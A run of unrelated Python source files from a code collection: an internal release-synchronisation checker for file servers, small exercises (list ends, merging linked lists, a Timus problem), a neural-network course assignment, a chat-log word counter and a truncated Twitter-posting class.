/usr/bin/python3\n\n#################################################\n# Natasha\n# Natasha is a script to crawl acQuire servers and\n# check the synchronisation of software releases.\n#\n# v1.025\n# for Issue \n#\n# Rodrigo Nobrega\n# 20150305-20181217\n#################################################\n__author__ = 'Rodrigo Nobrega'\n\n\n# import modules\nimport os.path\n# import datetime\n\n\n# variables USAGE:\nGIMVERSION = '4.0.1'\nACQVERSION = '4.5.7.1'\nNEOVERSION = '4.0.1.179'\nPCEWMVERSION = '4.0'\nPCEWCVERSION = '2.2'\nLRNVERSION = '2018.4'\nDRPWVERSION = '1.4.0'\nREFVERSION = '4.0.0'\nDEMOVERSION = '4.0.1'\n\n\n# NtServers()\nclass NtServers(object):\n \"\"\"\n Class to store acQuire internal server names\n \"\"\"\n def __init__(self):\n self.serverList = [['Perth', 'Fileserver', r'\\\\fileserver\\Client Release Distribution']\n #, ['Brisbane', 'BrisbaneFS', r'\\\\brisbanefs\\acQuire Software']\n #, ['Belo Horizonte', 'BeloFS', r'\\\\belofs\\Client Release Distribution']\n , ['Calgary', 'Warthog', r'\\\\warthog\\acQuireSoftware']\n , ['Johannesburg', 'JoburgFS', r'\\\\joburgfs\\acQuire Software']\n #, ['Manchester', 'ManchesterFS', r'\\\\manchesterfs\\acQuire Software']\n , ['Santiago', 'SantiagoFS', r'\\\\santiagofs\\Client Release Distribution']]\n\n\n# NtSoftware()\nclass NtSoftware(object):\n \"\"\"\n Class to store acQuire Software\n \"\"\"\n def __init__(self):\n self.softwareList = [[0, 'Everything', '', '']\n , [1, 'GIM Suite', '\\\\acQuire GIM Suite\\\\', '\\\\acQuire GIM Suite Desktop.exe', GIMVERSION]\n , [2, 'acQuire 4', '\\\\acQuire\\\\acQuire ', '\\\\web\\\\acquire.exe', ACQVERSION]\n , [3, 'acQuire Neo', '\\\\acQuire Neo\\\\acQuire Neo ', '\\\\acQuire Neo.msi', NEOVERSION]\n # , [4, 'Exploration Workflow - Minerals', '\\\\acQuire Packaged Workflows\\\\Exploration Workflow - Minerals\\\\', '\\\\acQuire Pre-configured Exploration Workflow - Minerals.exe', PCEWMVERSION]\n , [4, 'Exploration Workflow - Minerals', '\\\\acQuire Packaged Workflows\\\\Exploration Workflow - Minerals\\\\', '\\\\acQuire Pre-configured Exploration Workflow - Minerals.zip', PCEWMVERSION]\n , [5, 'Exploration Workflow - Coal', '\\\\acQuire Packaged Workflows\\\\Exploration Workflow - Coal\\\\', '\\\\acQuire Pre-configured Exploration Workflow - Coal.exe', PCEWCVERSION]\n , [6, 'Drilling Reconciliation Packaged Workflow [DRPW]', '\\\\acQuire Packaged Workflows\\\\Drilling Reconciliation\\\\', '\\\\acQuire Packaged Workflows - DR.exe', DRPWVERSION]\n # , [7, 'Reference Sets - Banksia Minerals', '\\\\acQuire Reference Sets\\\\', '\\\\Reference Datasets\\\\Minerals\\\\Banksia Minerals.msi', REFVERSION]\n , [7, 'Reference Sets - Banksia Minerals', '\\\\acQuire Reference Sets\\\\', '\\\\Reference Datasets\\\\Minerals\\\\Banksia_Minerals.zip', REFVERSION]\n , [8, 'acQuire Learning', '\\\\acQuire Learning\\\\', '\\\\Learning VM\\\\GIM Suite Learning VM.7z.001', LRNVERSION]\n # , [9, 'GIM Suite Demo VM', '\\\\acQuire Reference Sets\\\\', '\\\\GIM Suite {0} Demo VM\\\\GIM Suite {0} Demo VM.7z.001'.format(DEMOVERSION.replace('.0', '')), DEMOVERSION]\n , [9, 'GIM Suite Demo VM', '\\\\acQuire Reference Sets\\\\', '\\\\GIM Suite {0} Demo VM\\\\GIM Suite {0} Demo VM.part01.exe'.format(DEMOVERSION), DEMOVERSION]\n ]\n\n def getSoftware(self, option):\n if option < 0 or option > 6:\n option = 0\n else:\n option = int(option)\n if option == 0:\n return [i[1] for i in self.softwareList if i[0] > 0]\n else:\n return [i[1] for i in self.softwareList if i[0] == option]\n\n\n# NtSoftware()\nclass 
NtVersion(object):\n \"\"\"\n Class to store current versions\n \"\"\"\n def __init__(self):\n self.currentList = [[0, 'Everything', '1']\n , [1, 'GIM Suite', GIMVERSION]\n , [2, 'acQuire 4', ACQVERSION]\n , [3, 'acQuire Neo', NEOVERSION]\n , [4, 'Packaged Workflow [DRPW]', DRPWVERSION]\n , [5, 'Reference Sets', REFVERSION]\n , [6, 'acQuire Learning', LRNVERSION]\n , [7, 'GIM Suite Demo VM', DEMOVERSION]]\n\n def getVersion(self, software, option=None):\n if option == '' and len(software) == 1:\n return [i[2] for i in self.currentList if i[1] == software[0]]\n elif option == '' and len(software) > 1:\n # return [[i, j[2]] for i in software for j in self.currentList if i == j[1]]\n return [j[2] for i in software for j in self.currentList if i == j[1]]\n else:\n return option\n\n\n# NtOptions()\nclass NtOptions(object):\n \"\"\"\n Class to store user choices\n \"\"\"\n def __init__(self):\n # softwareOption\n try:\n a = int(float(input('Choose Software [] ? ')))\n if a in range(0, 7):\n self.softwareOption = a\n else:\n self.softwareOption = 0\n except:\n self.softwareOption = 0\n # versionOption\n if self.softwareOption == 0:\n self.versionOption = ''\n else:\n self.versionOption = input('Choose Version [] ? ')\n # softwareChoice\n self.softwareChoice = NtSoftware().getSoftware(self.softwareOption)\n # versionChoice\n if self.versionOption == '':\n self.versionChoice = NtVersion().getVersion(self.softwareChoice, self.versionOption)[0]\n else:\n self.versionChoice = self.versionOption\n\n\n# NtCrawl()\nclass NtCrawl(object):\n \"\"\"\n Class to crawl servers\n \"\"\"\n # def __init__(self, servers, software, options):\n # [self.checkSync(i, software, options) for i in servers.serverList]\n def __init__(self, servers, software):\n self.fullCrawl(servers, software)\n\n def checkSync(self, server, software, options):\n crawlString = '{}{}{}{} ...'.format(server[2]\n , software.softwareList[options.softwareOption][2]\n , options.versionChoice\n , software.softwareList[options.softwareOption][3])\n print('\\nTesting {}:'.format(server[1]))\n print(crawlString)\n if os.path.isfile(crawlString):\n print('OK')\n else:\n print('FAILED')\n\n def fullCrawl(self, serv, softw):\n for server in serv.serverList:\n print('-----------------------------------------------------------------------------')\n print(' {}'.format(server[1]))\n print('-----------------------------------------------------------------------------')\n for item in softw.softwareList[1:]:\n crawlstring = '{}{}{}{}'.format(server[2], item[2], item[4], item[3])\n if os.path.isfile(crawlstring):\n print(' OK : {} (version {})'.format(item[1], item[4]))\n else:\n print(' FAILED : {} (version {})'.format(item[1], item[4]))\n\n\n# test loop\ndef test():\n print('------------------------')\n print('Test.')\n print('------------------------')\n print('Servers:')\n print('------------------------')\n servidores = NtServers()\n #[print('Office: {}, Server: {}, Path: {}'.format(i[0], i[1], i[2])) for i in servidores.serverList]\n print('------------------------')\n print('Software:')\n print('------------------------')\n software = NtSoftware()\n [print('{}: {}'.format(i[0], i[1])) for i in software.softwareList]\n # print('------------------------')\n # print('Options:')\n print('------------------------')\n options = NtOptions()\n print('Software: {}, Version: {}'\n .format(options.softwareChoice, options.versionChoice))\n # options2 = NtOptions()\n # a = [[options2.softwareChoice[i], options2.versionChoice[i]] for i in range(0, 
len(options2.softwareChoice)-1)]\n    # NtCrawl(servidores, software, options)\n    NtCrawl(servidores, software)\n\n\n# main loop\ndef main():\n    print('\\n=============================================================================')\n    print('  Software Releases : Regional Servers Synchronisation Report')\n    print('=============================================================================')\n    servidores = NtServers()\n    software = NtSoftware()\n    # print('Options:')\n    # print('------------------------')\n    # [print('{}: {}'.format(i[0], i[1])) for i in software.softwareList]\n    # print('------------------------')\n    # options = NtOptions()\n    # NtCrawl(servidores, software, options)\n    NtCrawl(servidores, software)\n    print('=============================================================================')\n    print('  End of Report')\n    print('=============================================================================\\n')\n\n\n# main, calling main loop\nif __name__ == '__main__':\n    # test()\n    main()\n","sub_path":"src/Natasha.py","file_name":"Natasha.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"653781915","text":"import random\n\na = random.sample(range(100),random.randint(1,100))\n#creates a random list of length 1-100 from the numbers 0-99\n\nb =[]\n\nb.append(a[0])\nb.append(a[-1])\n\nprint(a)\nprint(b)\n\n","sub_path":"11-ListEnds.py","file_name":"11-ListEnds.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56022143","text":"class Node(object):\n    \"\"\"Define Node-class objects.\"\"\"\n\n    def __init__(self, val=None, next=None):\n        \"\"\"Initiate a new instance of a Node object with attributes.\"\"\"\n        self.val = val\n        self.next = next\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n\n    def push(self, nodes):\n        \"\"\"Push a single value or an iterable of values onto the head.\"\"\"\n        # iter() raises TypeError on non-iterables instead of returning False,\n        # so probe for __iter__ before deciding how to push\n        if not hasattr(nodes, '__iter__'):\n            nodes = [nodes]\n        for val in nodes:\n            self.head = Node(val, self.head)\n\n    def pop(self):\n        \"\"\"Remove and return the value of the head node of the list.\"\"\"\n        if self.head is None:\n            raise IndexError(\"List is empty\")\n        else:\n            popped_node = self.head\n            self.head = self.head.next\n            return popped_node.val\n\nclass Solution:\n    def mergeTwoLists(self, l1, l2):\n        \"\"\"Merge two sorted chains of Nodes and return the merged head.\"\"\"\n        dummy = tail = Node()\n        while l1 and l2:\n            if l1.val <= l2.val:\n                tail.next, l1 = l1, l1.next\n            else:\n                tail.next, l2 = l2, l2.next\n            tail = tail.next\n        tail.next = l1 or l2\n        return dummy.next\n\nif __name__ == '__main__':\n    # push prepends, so descending input builds an ascending list\n    l1 = LinkedList()\n    l1.push([4, 2, 1])\n    l2 = LinkedList()\n    l2.push([4, 3, 1])\n\n    s = Solution()\n    merged = s.mergeTwoLists(l1.head, l2.head)\n","sub_path":"merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"517309511","text":"import numpy as np\r\nimport numpy.random as rnd\r\nimport matplotlib.pyplot as plt\r\nimport sklearn.neural_network as nn\r\nimport bonnerlib2 as graph\r\nimport sklearn\r\nfrom matplotlib import cm\r\n\r\nprint (\"\\n\\nQuestion 1(a)\")\r\n\r\ndef genData(mu0,mu1,Sigma0,Sigma1,N):\r\n    \r\n    data0 = rnd.multivariate_normal(mu0,Sigma0, (N,1)).reshape((N,2))\r\n    data1 = rnd.multivariate_normal(mu1,Sigma1, (N,1)).reshape((N,2))\r\n    \r\n    t0 = np.zeros(N, dtype = int) \r\n    t1 = np.ones(N, dtype = int)\r\n    t = np.concatenate([t0,t1])\r\n    X = np.concatenate([data0,data1])\r\n\r\n    return sklearn.utils.shuffle(X,t)\r\n\r\nmu0 = [0,-1]\r\nmu1 = [-1,1]\r\nsigma0 = np.array([(2.0, 0.5), (0.5,1.0)])\r\nsigma1 = np.array([(1.0,-1.0), (-1.0,2.0)])\r\nX_train,t_train = 
genData(mu0,mu1,sigma0,sigma1,1000)\r\nX_test,t_test = genData(mu0,mu1,sigma0,sigma1,10000)\r\n\r\n#--------------------------------------------------------------------------------------------------------------------------------\r\nprint (\"\\n\\nQuestion 1(b)\")\r\n\r\n#Classifier \r\nclf = nn.MLPClassifier((1,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\nclf = clf.fit(X_train,t_train)\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(b): Neural net with 1 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(clf)\r\nprint(\"Explain this similarity\")\r\n\r\n\r\n#-------------------------------------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(c)\")\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(c): Neural net with 2 hidden units' )\r\nbestAcc = 0\r\nnum = 0\r\nbestNum = 0\r\nwhile(num != 9):\r\n plt.subplot(3,3, num+1)\r\n clf = nn.MLPClassifier((2,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\n clf = clf.fit(X_train,t_train)\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n graph.dfContour(clf)\r\n #Accuracy\r\n acc = clf.score(X_test,t_test)\r\n if (acc>bestAcc):\r\n bestAcc = acc\r\n bestNum = num\r\n bestclfC = clf\r\n \r\n num += 1\r\n \r\nplt.figure()\r\nplt.suptitle('Question 1(c): Best neural net with 2 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(bestclfC)\r\nprint(bestAcc, bestNum)\r\n\r\n#------------------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(d)\")\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(d): Neural net with 3 hidden units' )\r\nbestAcc = 0\r\nnum = 0\r\nbestNum = 0\r\nwhile(num != 9):\r\n plt.subplot(3,3, num+1)\r\n clf = nn.MLPClassifier((3,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\n clf = clf.fit(X_train,t_train)\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n graph.dfContour(clf)\r\n #Accuracy\r\n acc = clf.score(X_test,t_test)\r\n if (acc>bestAcc):\r\n bestAcc = acc\r\n bestNum = num\r\n bestclfD = clf\r\n \r\n num += 1\r\n \r\nplt.figure()\r\nplt.suptitle('Question 1(d): Best neural net with 3 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(bestclfD)\r\nprint(bestAcc, bestNum)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(e)\")\r\n\r\ncolors = np.array(['r','b'])\r\nplt.figure()\r\nplt.suptitle('Question 1(e): Neural net with 4 hidden units' )\r\nbestAcc = 0\r\nnum = 0\r\nbestNum = 0\r\nwhile(num != 9):\r\n plt.subplot(3,3, num+1)\r\n clf = nn.MLPClassifier((4,), \"tanh\", \"sgd\", learning_rate_init=0.01, max_iter= 10000,tol=10**(-10))\r\n clf = clf.fit(X_train,t_train)\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n graph.dfContour(clf)\r\n #Accuracy\r\n acc = clf.score(X_test,t_test)\r\n if (acc>bestAcc):\r\n bestAcc = acc\r\n bestNum = num\r\n bestclfE = clf\r\n \r\n num += 1\r\n \r\nplt.figure()\r\nplt.suptitle('Question 1(e): Best neural net with 4 hidden unit' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\ngraph.dfContour(bestclfE)\r\nprint(bestAcc, 
bestNum)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(g)\")\r\n\r\n#Bias\r\nw0 = bestclfD.intercepts_\r\n#weight Vector\r\nw = bestclfD.coefs_\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(g): Decision boundaries for 3 hidden units' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\nx = np.linspace(-5.0, 5.0, num=(1000))\r\nplt.xlim((-5,5))\r\nplt.ylim((-7,7))\r\nplt.plot(x,-(w[0][0][0]*x+w0[0][0])/(w[0][1][0]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][1]*x+w0[0][1])/(w[0][1][1]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][2]*x+w0[0][2])/(w[0][1][2]), c='black', linestyle='dashed')\r\ngraph.dfContour(bestclfD)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(h)\")\r\n\r\n#Bias\r\nw0 = bestclfC.intercepts_\r\n#weight Vector\r\nw = bestclfC.coefs_\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(h): Decision boundaries for 2 hidden units' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\nx = np.linspace(-5.0, 5.0, num=(1000))\r\nplt.xlim((-5,5))\r\nplt.ylim((-7,7))\r\nplt.plot(x,-(w[0][0][0]*x+w0[0][0])/(w[0][1][0]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][1]*x+w0[0][1])/(w[0][1][1]), c='black', linestyle='dashed')\r\ngraph.dfContour(bestclfC)\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\nprint (\"\\n\\nQuestion 1(i)\")\r\n\r\n#Bias\r\nw0 = bestclfE.intercepts_\r\n#weight Vector\r\nw = bestclfE.coefs_\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(i): Decision boundaries for 4 hidden units' )\r\nplt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\nx = np.linspace(-5.0, 5.0, num=(1000))\r\nplt.xlim((-5,5))\r\nplt.ylim((-7,7))\r\nplt.plot(x,-(w[0][0][0]*x+w0[0][0])/(w[0][1][0]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][1]*x+w0[0][1])/(w[0][1][1]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][2]*x+w0[0][2])/(w[0][1][2]), c='black', linestyle='dashed')\r\nplt.plot(x,-(w[0][0][3]*x+w0[0][3])/(w[0][1][3]), c='black', linestyle='dashed')\r\ngraph.dfContour(bestclfE)\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 1(k)')\r\n\r\n#Generate the curve\r\n\r\nM = 1000\r\nt = np.linspace(0,1,M)\r\nprecision = np.zeros([M])\r\nrecall = np.zeros([M])\r\n#TruePos = np.zeros([20000,4])\r\nnumPos = np.sum(t_test)\r\nlol = w[0]\r\nz= bestclfD.predict_proba(X_test)[:,1]\r\nfor n in range(M):\r\n PredictedPos = z>=t[n]\r\n TruePos = t_test & PredictedPos\r\n numPP = np.sum(PredictedPos)\r\n numTP = np.sum(TruePos)\r\n \r\n precision[n] = numTP/np.float(numPP)\r\n recall[n] = numTP/np.float(numPos)\r\n\r\nplt.figure()\r\nplt.suptitle('Question 1(k): Precision/recall curve')\r\nplt.plot(recall,precision)\r\nplt.xlabel('Recall')\r\nplt.ylabel('Precision')\r\n\r\n#----------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 1(l)')\r\n\r\narea = 0.0\r\nfor m in range(1, len(recall)):\r\n area+= precision[m] * (recall[m-1]-recall[m])\r\nprint(area)\r\n\r\n#--------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 3(a)')\r\n\r\nX_train,t_train = genData(mu0,mu1,sigma0,sigma1,10000)\r\nX_test,t_test = 
genData(mu0,mu1,sigma0,sigma1,10000)\r\n\r\n\r\ndef forward(X,V,v0,W,w0):\r\n u = np.matmul(X,V)+v0\r\n h = np.tanh(u)\r\n z = np.matmul(h,W)+w0\r\n o = 1 /(1 + np.exp(-z))\r\n o = o.reshape(-1,1)[:,0]\r\n return u,h,z,o\r\n\r\nnn3 = bestclfD\r\nw0 = nn3.intercepts_\r\nw = nn3.coefs_\r\nu,h,z,o1 = forward(X_test, w[0],w0[0],w[1],w0[1])\r\n\r\no2 = nn3.predict_proba(X_test)\r\n\r\ndiff = np.sum((o1-o2[:,1])**2)\r\nprint(diff)\r\n\r\n#-----------------------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 3(b)')\r\n\r\n\r\n# *** modified ***\r\n \r\ndef MYdfContour(V,v0,W,w0):\r\n ax = plt.gca()\r\n # The extent of xy space\r\n x_min,x_max = ax.get_xlim()\r\n y_min,y_max = ax.get_ylim()\r\n \r\n # form a mesh/grid over xy space\r\n h = 0.02 # mesh granularity\r\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\r\n np.arange(y_min, y_max, h))\r\n mesh = np.c_[xx.ravel(),yy.ravel()]\r\n \r\n # evaluate the decision functrion at the grid points\r\n Z = forward(mesh, V,v0,W,w0)[3]\r\n \r\n # plot the contours of the decision function\r\n Z = Z.reshape(xx.shape)\r\n mylevels=np.linspace(0.0,1.0,11)\r\n ax.contourf(xx, yy, Z, levels=mylevels, cmap=cm.RdBu, alpha=0.5)\r\n \r\n # draw the decision boundary in solid black\r\n ax.contour(xx, yy, Z, levels=[0.5], colors='k', linestyles='solid')\r\n\r\ndef gradient(h,o,T,X,W):\r\n l = (o-T)/ np.shape(h)[0]\r\n w = np.matmul(np.transpose(h), l)\r\n w0 = np.sum(l,axis= 0)\r\n W = W.reshape([W.shape[0], 1])\r\n l = l.reshape([l.shape[0],1])\r\n l2 = np.matmul(l,np.transpose(W))*(1-h**2)\r\n v = np.matmul(np.transpose(l2), X)\r\n v0 = np.sum(l2,axis=0)\r\n return w, w0, np.transpose(v), v0\r\n\r\ndef bgd(J,K,lrate):\r\n \r\n #Ttrain = np.zeros([np.shape(X_train)[0]])\r\n #Ttest = np.zeros([np.shape(X_test)[0],K])\r\n\r\n W_weights = rnd.randn(J)\r\n W_bias = 0.0\r\n V_weights = rnd.randn(2,J)\r\n V_bias = np.zeros(J)\r\n \r\n Etrain = []\r\n\r\n accTrain = []\r\n accTest = []\r\n\r\n for i in range(0,K):\r\n \r\n u,h,z,o1 = forward(X_train, V_weights,V_bias,W_weights,W_bias)\r\n \r\n NW, Nw0, NV, Nv0 = gradient(h,o1, t_train, X_train, W_weights)\r\n\r\n W_weights = W_weights - lrate*NW\r\n W_bias = W_bias - lrate*Nw0\r\n V_weights = V_weights - lrate*NV\r\n V_bias = V_bias- lrate*Nv0\r\n \r\n \r\n \r\n if (i%10 == 0):\r\n o_test = forward(X_test, V_weights,V_bias,W_weights,W_bias)[3]\r\n o_train = forward(X_train, V_weights,V_bias,W_weights,W_bias)[3]\r\n predictions_test = o_test > 0.5 \r\n predictions_train = o_train > 0.5\r\n \r\n Etrain.append(-np.sum((t_train*np.log(o1)))/np.shape(t_train)[0])\r\n print('Loss Train ', -np.sum((t_train*np.log(o1)))/np.shape(t_train)[0])\r\n \r\n accTrain.append(np.mean(t_train == predictions_train)*100.0)\r\n print('Acc Train ', np.mean(t_train == predictions_train)*100.0)\r\n accTest.append(np.mean(t_test == predictions_test)*100.0)\r\n print('Acc Test ', np.mean(t_test == predictions_test)*100.0)\r\n \r\n\r\n print('Final Test Accuracy', accTest[-1])\r\n\r\n plt.figure()\r\n plt.suptitle('Question 3(b):training and test accuracy for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(10,K+1,10),accTrain, '#FFA500')\r\n plt.semilogx(range(10,K+1, 10),accTest, 'b')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b):training loss for bgd')\r\n plt.ylabel(\"loss\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(10,K+1,10),Etrain, '#FFA500')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b): final test accuracy for 
bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(accTest[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b): final training loss for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(Etrain[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(b): Decisiom boundary for my neural net' )\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n MYdfContour(V_weights,V_bias,W_weights,W_bias)\r\n \r\nbgd(3,1000,1.0)\r\n\r\n#--------------------------------------------------------------------------------------\r\n\r\nprint('\\n\\nQuestion 3(c)')\r\n\r\ndef sgd(J,K,lrate):\r\n W_weights = rnd.randn(J)\r\n W_bias = 0.0\r\n V_weights = rnd.randn(2,J)\r\n V_bias = np.zeros(J)\r\n \r\n Etrain = []\r\n\r\n accTrain = []\r\n accTest = []\r\n \r\n for i in range(0,K):\r\n \r\n N1 = 0\r\n while (N1 < np.shape(t_train)[0]):\r\n \r\n N2 = np.min([N1+50,np.shape(t_train)[0]])\r\n X = X_train[N1:N2]\r\n T = t_train[N1:N2]\r\n N1 = N2\r\n \r\n u,h,z,o1 = forward(X, V_weights,V_bias,W_weights,W_bias)\r\n NW, Nw0, NV, Nv0 = gradient(h,o1, T, X, W_weights)\r\n \r\n W_weights = W_weights - lrate*NW\r\n W_bias = W_bias - lrate*Nw0\r\n V_weights = V_weights - lrate*NV\r\n V_bias = V_bias- lrate*Nv0\r\n\r\n o_test = forward(X_test, V_weights,V_bias,W_weights,W_bias)[3]\r\n o_train = forward(X_train, V_weights,V_bias,W_weights,W_bias)[3]\r\n predictions_test = o_test > 0.5 \r\n predictions_train = o_train > 0.5\r\n \r\n Etrain.append(-np.sum((T*np.log(o1)))/np.shape(T)[0])\r\n print('Loss Train ', -np.sum((T*np.log(o1)))/np.shape(T)[0])\r\n \r\n accTrain.append(np.mean(t_train == predictions_train)*100.0)\r\n print('Acc Train ', np.mean(t_train == predictions_train)*100.0)\r\n accTest.append(np.mean(t_test == predictions_test)*100.0)\r\n print('Acc Test ', np.mean(t_test == predictions_test)*100.0)\r\n \r\n\r\n print('Final Test Accuracy', accTest[-1])\r\n\r\n plt.figure()\r\n plt.suptitle('Question 3(c):training and test accuracy for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(1,K+1),accTrain, '#FFA500')\r\n plt.semilogx(range(1,K+1),accTest, 'b')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c):training loss for bgd')\r\n plt.ylabel(\"loss\")\r\n plt.xlabel(\"epoch\")\r\n plt.semilogx(range(1,K+1),Etrain, '#FFA500')\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c): final test accuracy for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(accTest[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c): final training loss for bgd')\r\n plt.ylabel(\"accuracy\")\r\n plt.xlabel(\"training time\")\r\n plt.plot(Etrain[-K//2:])\r\n \r\n plt.figure()\r\n plt.suptitle('Question 3(c): Decisiom boundary for my neural net' )\r\n plt.scatter(X_train[:,0],X_train[:,1], s = 2, c = colors[t_train])\r\n MYdfContour(V_weights,V_bias,W_weights,W_bias)\r\n \r\nsgd(3,20,1.0)","sub_path":"A3 2018/A3.py","file_name":"A3.py","file_ext":"py","file_size_in_byte":14407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"642244743","text":"post = [['A', 'P', 'O', 'R'], ['B', 'M', 'S'], []]\n\ncount = 0\ncurrent = 0\n\nn = int(input())\n\nfor i in range(n):\n receiver = input()\n r = receiver[0]\n\n if r in post[0]:\n target = 0\n elif r in post[1]:\n target = 1\n else:\n target = 2\n\n count += abs((target - current))\n current = 
target\n\nprint(count)","sub_path":"Timus/2023_Donald_is_a_postman.py","file_name":"2023_Donald_is_a_postman.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"364011496","text":"# 读取\ndef read_file(filename):\n with open(filename, 'r', encoding='utf-8-sig') as f:\n lines = []\n for line in f:\n lines.append(line.strip('\\n'))\n return lines\n\n\n# 转换\ndef convert(lines):\n chat = []\n allen_word_count = 0\n allen_sticker_count = 0\n allen_image_count = 0\n\n viki_word_count = 0\n viki_sticker_count = 0\n viki_image_count = 0\n for line in lines:\n s = line.split(' ')\n time = s[0]\n name = s[1]\n\n if name == 'Allen':\n if s[2] == '貼圖':\n allen_sticker_count += 1\n elif s[2] == '圖片':\n allen_image_count += 1\n else:\n for msg in s[2:]:\n allen_word_count += len(msg)\n elif name == 'Viki':\n if s[2] == '貼圖':\n viki_sticker_count += 1\n elif s[2] == '圖片':\n viki_image_count += 1\n else:\n for msg in s[2:]:\n viki_word_count += len(msg)\n\n print('allen说了', allen_word_count, '个字')\n print('allen发了', allen_sticker_count, '个贴图')\n print('allen发了', allen_image_count, '个字')\n\n print('viki说了', viki_word_count, '个字')\n print('viki发了', viki_sticker_count, '个贴图')\n print('viki发了', viki_image_count, '个字')\n\n return chat\n\n\n# 输出\ndef write_file(filename, lines):\n with open(filename, 'w', encoding='utf-8-sig') as f:\n for line in lines:\n f.write(line)\n\n\n# 合成main\ndef main():\n lines = read_file('LINE-Viki.txt')\n\n chat = convert(lines)\n\n # write_file('output.txt', chat)\n\n\nmain()","sub_path":"day5/十九。专案:聊天记录列表处理.py","file_name":"十九。专案:聊天记录列表处理.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595948052","text":"import tweepy\nimport random\n\n\nclass Twitter(object):\n ''' simple class to 'tweet', requires configuration dict '''\n\n def __init__(self, conKey, conSecret, accKey, accSecret):\n ''' provide config dict, see tweet method for requirements '''\n auth = tweepy.OAuthHandler(conKey, conSecret)\n auth.set_access_token(accKey, accSecret)\n self.tweepy = tweepy.API(auth)\n\n def generate_message(self, year, id):\n # message options, url template\n messages = [\n 'Next up for auction is a {} Mexican Libertad!',\n 'An auction for a {} Mexican Libertad is ending soon!',\n 'Get this {} Mexican Libertad while you can!',\n 'Place your bid now on this {} Mexican Libertad'\n ]\n url = ' http://bitlibertad.com/year/{}/{}'\n # assemble message\n message = random.choice(messages).format(year)\n message += url.format(str(year), id)\n return message\n\n def tweet(self, tweet):\n self.tweepy.update_status(status=tweet)\n\n def tweet_with_image(self, tweet, image):\n 